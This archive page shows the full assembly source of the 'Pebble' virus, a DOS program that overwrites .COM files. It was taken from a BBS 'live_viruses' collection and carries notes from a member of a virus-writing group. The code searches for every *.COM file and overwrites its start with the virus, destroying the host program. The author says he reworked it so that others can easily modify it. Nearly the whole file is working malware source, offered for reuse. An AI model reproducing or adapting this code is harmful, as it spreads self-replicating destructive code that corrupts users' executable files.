home *** CD-ROM | disk | FTP | other *** search
/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / live_viruses / virus_collections / pebble.asm < prev    next >
Assembly Source File  |  1992-11-13  |  3KB  |  80 lines
  1.  
  2. ;*****************************************************************************
  3. ;                          The Pebble Virus (Disassembly)
  4. ;
  5. ;                     Disassembled and modified by Data Disruptor
  6. ;                                     (May.6.92)
  7. ;
  8. ;                            (c) 1992 RABID International
  9. ;*****************************************************************************
  10. ;
  11. ; Notes:
  12. ; ------
  13. ;
  14. ; This is quite possibly one of the smallest overwriting COM infectors I
  15. ; have ever seen. It overwrites the first 50 bytes of a host COM file with
  16. ; itself and then terminates back to DOS.
  17. ;
  18. ; It does not preserve the timestamp, nor does it check to see if a file has
  19. ; allready been infected.
  20. ;
  21. ; I have modified the source code so that if people wish to hack this virus,
  22. ; it is easily done so, as Sourcer original disassemblies do not allow for
  23. ; modification of it's output ASM file.
  24. ;
  25. ; Have fun...
  26. ;
  27. ;       Data Disruptor
  28. ;*****************************************************************************
  29.  
  30. code            segment byte public
  31.                 assume  cs:code, ds:code
  32.                 org     100h
  33.  
  34. pebble          proc    far
  35.  
  36. v_start         equ     $                       ; Marker for virus start
  37. file_name       equ     9Eh                     ; Offset in DTA of file name
  38.  
  39. start:
  40.                 mov     ah,4Eh                  ; Find first file
  41.                 mov     cx,27h
  42.                 mov     dx,offset search        ; Specify search string
  43. do_function:
  44.                 int     21h
  45.                 jc      no_files                ; Error? Therefore, no files
  46.                                                 ; were found
  47.                 call    infector                ; Found a file? Infect it.
  48.                 mov     ah,4Fh                  ; Set up DOS for find next file
  49.                 jmp     short do_function       ; Issue INT 21
  50. no_files:
  51.                 int     20h                     ; DOS program terminate
  52.  
  53. pebble          endp
  54.  
  55. infector        proc    near
  56.                 mov     ax,3D02h                ; Open file with read/write
  57.                                                 ; access
  58.                 mov     dx,file_name            ; With the file name found
  59.                                                 ; in 4Eh or 4Fh
  60.                 int     21h
  61.  
  62.                 mov     ah,40h                  ; Write to file
  63.                 mov     cx,(v_end-v_start)      ; Length of the virus
  64.                 mov     dx,100h                 ; Set for beginning of file
  65.                                                 ; (COM Org = 100h)
  66.                 int     21h
  67.  
  68.                 mov     ah,3Eh                  ; Close the file
  69.                 int     21h
  70.  
  71.                 retn
  72. infector        endp
  73.  
  74. search          db       '*.COM',0              ; What to search for
  75. v_end           equ     $                       ; Marker for virus end
  76.  
  77. code            ends
  78. end             start
  79.  
  80.